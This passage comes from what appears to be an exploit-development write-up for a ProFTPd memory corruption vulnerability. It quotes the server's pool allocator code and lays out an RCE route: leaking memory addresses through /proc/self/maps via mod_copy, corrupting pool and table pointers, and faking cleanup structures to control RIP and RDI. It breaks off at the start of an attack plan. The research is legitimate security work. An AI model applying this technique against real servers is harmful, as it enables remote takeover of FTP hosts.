  free_first_avail = 0x4141414141414141 <error: Cannot access memory at address 0x4141414141414141>,
  tag = 0x4141414141414141 <error: Cannot access memory at address 0x4141414141414141>
}

Obviously, as there are not valid pointers in the struct, we end up on a segmentation fault on this line of code:


first_avail = blok->h.first_avail

blok, which coincides with the p->last value, is 0x4141414141414141 at that time

The ProFTPd Pool Allocator

The ProFTPd pool allocator is the same as the Apache.

Allocations here take place using palloc() and pcalloc(), which are wrapping functions for alloc_pool()

ProFTPd Pool Allocator works with blocks, which are actual glibc heap chunks.

Each block has a block_hdr header structure that defines it:


union block_hdr {
  union align a;

  /* Padding */
#if defined(_LP64) || defined(__LP64__)
  char pad[32];
#endif

  /* Actual header */
  struct {
    void *endp;
    union block_hdr *next;
    void *first_avail;
  } h;
};

  • blok->h.endp points to the end of current block
  • blok->h.next points to the next block in a linked list
  • blok->h.first_avail points to the first available memory within this block

This is the alloc_pool() code:


static void *alloc_pool(struct pool_rec *p, size_t reqsz, int exact) {

  size_t nclicks = 1 + ((reqsz - 1) / CLICK_SZ);
  size_t sz = nclicks * CLICK_SZ;
  union block_hdr *blok;
  char *first_avail, *new_first_avail;

  blok = p->last;
  if (blok == NULL) {
    errno = EINVAL;
    return NULL;
  }

  first_avail = blok->h.first_avail;

  if (reqsz == 0) {
    errno = EINVAL;
    return NULL;
  }

  new_first_avail = first_avail + sz;

  if (new_first_avail <= (char *) blok->h.endp) {
    blok->h.first_avail = new_first_avail;
    return (void *) first_avail;
  }

  pr_alarms_block();

  blok = new_block(sz, exact);
  p->last->h.next = blok;
  p->last = blok;

  first_avail = blok->h.first_avail;
  blok->h.first_avail = sz + (char *) blok->h.first_avail;

  pr_alarms_unblock();
  return (void *) first_avail;
}

As we can see, it first tries to use memory within the same block, if no space, is allocates a new block with new_block() and updates the pool last block on p->last.

Pool headers, defined by pool_rec structure, are stored right after the first block created for that pool, as we can see on make_sub_pool() which creates a new pool:


struct pool_rec *make_sub_pool(struct pool_rec *p) {
  union block_hdr *blok;
  pool *new_pool;

  pr_alarms_block();

  blok = new_block(0, FALSE);

  new_pool = (pool *) blok->h.first_avail;
  blok->h.first_avail = POOL_HDR_BYTES + (char *) blok->h.first_avail;

  memset(new_pool, 0, sizeof(struct pool_rec));
  new_pool->free_first_avail = blok->h.first_avail;
  new_pool->first = new_pool->last = blok;

  if (p) {
    new_pool->parent = p;
    new_pool->sub_next = p->sub_pools;

    if (new_pool->sub_next)
      new_pool->sub_next->sub_prev = new_pool;

    p->sub_pools = new_pool;
  }

  pr_alarms_unblock();

  return new_pool;
}

Actually, make_sub_pool() is responsible for creating the permanent pool aswell, which has no parent. p will be NULL when doing it.

Looking at make_sub_pool() code, you can realize that it gets a new block, and just after the block_hdr headers, pool_rec headers are entered and blok->h.first_avail is updated to point right after it.

Then, entries of the new created pool are initialized.

The p->cleanups entry is a pointer to a cleanup_t struct:


typedef struct cleanup {
  void *data;
  void (*plain_cleanup_cb)(void *);
  void (*child_cleanup_cb)(void *);
  struct cleanup *next;

} cleanup_t;

Cleanups are interpreted by the function run_cleanups() and registered with the function register_cleanup()

A chain of blocks can be freed using free_blocks():


static void free_blocks(union block_hdr *blok, const char *pool_tag) {

  union block_hdr *old_free_list = block_freelist;

  if (!blok)
    return;

  block_freelist = blok;

  while (blok->h.next) {
    chk_on_blk_list(blok, old_free_list, pool_tag);
    blok->h.first_avail = (char *) (blok + 1);
    blok = blok->h.next;
  }

  chk_on_blk_list(blok, old_free_list, pool_tag);
  blok->h.first_avail = (char *) (blok + 1);
  blok->h.next = old_free_list;
}

Exploitation Analysis

We have control over a really interesting pool_rec struct, now we might need to search for primitives that allow us to get something useful from this vulnerability, like obtaining Remote Code Execution.

Leaking memory addresses

Obviously to exploit this vulnerability predictable memory addresses is a requirement before using primitives, as in this case, the exploitation consists on playing with pointers, structs and memory writes.

Leaking memory addresses on this situation is really hard, as we are on a cleanup/session finishing process and to trigger the vulnerability we actually need to generate an interruption.

I first thought about reading /proc/self/maps file, which can be read by any process, even with low privileges.

Perhaps in theory it would work, unfortunately ProFTPd uses stat syscall to retrieve file size, as stat over pseudo-files like maps returns zero, this breaks transfer, and 0 bytes are returned back to client on data channel.

Thinking on additional ways to do it, I realized about mod_copy, which is a module in ProFTPd that allows you to copy files within the server.

We can use mod_copy to copy the file from /proc/self/maps to /tmp, and once there, we perform a normal transfer over the file at /tmp which is not a pseudo-file now, so /proc/self/maps content will be returned to attacker.

This leak is really interesting as it gives you addresses for every segment, and even the filename of the shared libraries, which sometimes contain versions like libc-2.31.so, and this is really interesting for exploit reliability, we could use offsets for specific libc versions.

Hijacking the control-flow

We have to transform our control over session.curr_cmd_rec->pool into any write primitive allowing us to reach run_cleanups() somehow with an arbitrary cleanup_t struct.

Looking for struct entry writes, there was nothing useful that would allow us direct write-what-where primitives (would be a lot easier this way).

Instead, the only way we can use to write something on arbitrary addresses is to use make_sub_pool() (at pool.c:415), which is called with cmd->pool as argument at some point:


struct pool_rec *make_sub_pool(struct pool_rec *p) {
  union block_hdr *blok;
  pool *new_pool;

  pr_alarms_block();

  blok = new_block(0, FALSE);

  new_pool = (pool *) blok->h.first_avail;
  blok->h.first_avail = POOL_HDR_BYTES + (char *) blok->h.first_avail;

  memset(new_pool, 0, sizeof(struct pool_rec));
  new_pool->free_first_avail = blok->h.first_avail;
  new_pool->first = new_pool->last = blok;

  if (p) {
    new_pool->parent = p;
    new_pool->sub_next = p->sub_pools;

    if (new_pool->sub_next)
      new_pool->sub_next->sub_prev = new_pool;

    p->sub_pools = new_pool;
  }

  pr_alarms_unblock();

  return new_pool;
}

This function is called at main.c:287 from _dispatch() function with our controlled pool as argument:


...

      if (cmd->tmp_pool == NULL) {
        cmd->tmp_pool = make_sub_pool(cmd->pool);
        pr_pool_tag(cmd->tmp_pool, "cmd_rec tmp pool");
      }
      
...

As you can see new_pool->sub_next has now the value of p->sub_pools, which is controlled, then we enter on new_pool->sub_next->sub_prev the new_pool pointer.

This means, we can write to any arbitrary address the value of new_pool, which apparently, appears not to be so useful at all, as the only relationship we have with this newly created pool cmd->tmp_pool is that cmd->tmp_pool->parent is equal to resp_pool as we are the parent pool for it.

Also the only value we control is the new_pool->sub_next, which we actually use for the write primitive.

What more interesting primitives do we have?

On a previous section we explained how the ProFTPd pool allocator works, when a new pool is created, p->first and p->last point to blocks used for the pool, we are interested in the p->last as it is the block that is actually used, as we can see on alloc_pool() at pool.c:570:

...

  blok = p->last;
  if (blok == NULL) {
    errno = EINVAL;
    return NULL;
  }

  first_avail = blok->h.first_avail;
  
...

first_avail is the pointer to the limit between used data and available free space, which is where we will start to allocate memory.

Our pool is passed to pstrdup() multiple times for string allocation:


char *pstrdup(pool *p, const char *str) {
  char *res;
  size_t len;

  if (p == NULL ||
      str == NULL) {
    errno = EINVAL;
    return NULL;
  }

  len = strlen(str) + 1;

  res = palloc(p, len);
  if (res != NULL) {
    sstrncpy(res, str, len);
  }

  return res;
}

This function calls palloc() which ends up calling alloc_pool()

The allocations are mostly non-controllable strings, which seem not useful to us, except from one allocation at cmd.c:373 on function pr_cmd_get_displayable_str():

...

  if (pr_table_add(cmd->notes, pstrdup(cmd->pool, "displayable-str"),
      pstrdup(cmd->pool, res), 0) < 0) {
    if (errno != EEXIST) {
      pr_trace_msg(trace_channel, 4,
        "error setting 'displayable-str' command note: %s", strerror(errno));
    }
  }
  
...

As you can see, cmd->pool (our controlled pool) is passed to pstrdup(), and as seen at cmd.c:363:


...

  if (argc > 0) {
    register unsigned int i;

    res = pstrcat(p, res, pr_fs_decode_path(p, argv[0]), NULL);

    for (i = 1; i < argc; i++) {
      res = pstrcat(p, res, " ", pr_fs_decode_path(p, argv[i]), NULL);
    }
  }

... 
 

res points to our last command sent


...

  if (pr_table_add(cmd->notes, pstrdup(cmd->pool, "displayable-str"),
      pstrdup(cmd->pool, res), 0) < 0) {
    if (errno != EEXIST) {
      pr_trace_msg(trace_channel, 4,
        "error setting 'displayable-str' command note: %s", strerror(errno));
    }
  }
  
...

This means if we send arbitrary data instead of a command, we could enter custom data on pool block space, and as we can corrupt p->last we can make blok->h.first_avail point to any address we want, and this means we can overwrite through a command any data.

Unfortunately, it is not like our corruption from data channel, as here our commands are treated as strings, and not binary data as the data channel does.

This means we are very limited on overwriting structs or any useful data.

Also, some allocations happen before, and the heap from the intial value of blok->h.first_avail to that value when pstrdup()β€˜ing our command will be full of strings, and non valid pointers which could likely end up on a crash before reaching run_cleanups().

Initially, I decided to use blok->h.first_avail to overwrite cmd->tmp_pool entries with arbitrary data.

This pool is freed with destroy_pool() at main.c:409 on function _dispatch():


...

      destroy_pool(cmd->tmp_pool);
      cmd->tmp_pool = NULL;
      
...

This means if we control the cmd->tmp_pool->cleanups value when reaching clear_pool() we would have the ability to control RIP and RDI once run_cleanups() is called:


void destroy_pool(pool *p) {
  if (p == NULL) {
    return;
  }

  pr_alarms_block();

  if (p->parent) {
    if (p->parent->sub_pools == p) {
      p->parent->sub_pools = p->sub_next;
    }

    if (p->sub_prev) {
      p->sub_prev->sub_next = p->sub_next;
    }

    if (p->sub_next) {
      
      p->sub_next->sub_prev = p->sub_prev;
    }
  }

  clear_pool(p);
  free_blocks(p->first, p->tag);

  pr_alarms_unblock();
  
}

As you can see clear_pool() is called, but after accessing some of the entries of the pool, which must be either NULL or a valid writable address.

Once clear_pool() is called:


static void clear_pool(struct pool_rec *p) {

  /* Sanity check. */
  if (p == NULL) {
    return;
  }

  pr_alarms_block();

  run_cleanups(p->cleanups);
  p->cleanups = NULL;

  while (p->sub_pools) {
    destroy_pool(p->sub_pools);
  }

  p->sub_pools = NULL;

  free_blocks(p->first->h.next, p->tag);
  p->first->h.next = NULL;

  p->last = p->first;
  p->first->h.first_avail = p->free_first_avail;

  pr_alarms_unblock();
}

We can see that run_cleanups() is called directly without more checks / memory writes.

When calling function run_cleanups():


static void run_cleanups(cleanup_t *c) {
  while (c) {
    if (c->plain_cleanup_cb) {
      (*c->plain_cleanup_cb)(c->data);
    }

    c = c->next;
  }
}

Looking at cleanup_t struct:


typedef struct cleanup {
  void *data;
  void (*plain_cleanup_cb)(void *);
  void (*child_cleanup_cb)(void *);
  struct cleanup *next;

} cleanup_t;

We can control RIP with c->plain_cleanup_cb and RDI with c->data

Unfortunately, corrupting cmd->tmp_pool is difficult, as a string displayable-str is appended right after our controllable data, and right after our p->cleanup entry there are some entries that are accessed on destroy_pool() before reaching run_cleanups().

@DUKPT_ who is also working on a PoC for this vulnerability was overwriting gid_tab->pool. Which is a more reliable technique as there are no pointers after our controllable data, so when displayable-str is appended, nothing serious will be broken, and also, here, instead of corrupting a pool_rec structure, we corrupt a pr_table_t structure, so we can point gid_tab->pool to memory corrupted from the data channel, which also accepts NULLs and we can craft a fake pool_rec structure with an arbitrary p->cleanup value to a fake cleanup_t struct which will be finally passed to run_cleanups().

The interesting use of gid_tab is also that gid_tab->pool is passed to destroy_pool() on pr_table_free() with argument gid_tab:


int pr_table_free(pr_table_t *tab) {

  if (tab == NULL) {
    errno = EINVAL;
    return -1;
  }

  if (tab->nents != 0) {
    errno = EPERM;
    return -1;
  }

  destroy_pool(tab->pool);
  return 0;
}

This is how pr_table_t looks like:


struct table_rec {
  pool *pool;
  unsigned long flags;
  unsigned int seed;
  unsigned int nmaxents;
  pr_table_entry_t **chains;
  unsigned int nchains;
  unsigned int nents;
  pr_table_entry_t *free_ents;
  pr_table_key_t *free_keys;
  pr_table_entry_t *tab_iter_ent;
  pr_table_entry_t *val_iter_ent;
  pr_table_entry_t *cache_ent;
  int (*keycmp)(const void *, size_t, const void *, size_t);
  unsigned int (*keyhash)(const void *, size_t);
  void (*entinsert)(pr_table_entry_t **, pr_table_entry_t *);
  void (*entremove)(pr_table_entry_t **, pr_table_entry_t *);
};

...

typedef struct table_rec pr_table_t;

As you can see after tab->pool (tab->flags, tab->seed and tab->nmaxents) there are no pointers so the string appended will not trigger crashes

So, what is the plan?

1) Craft a fake block_hdr structure that will be pointed to by p->last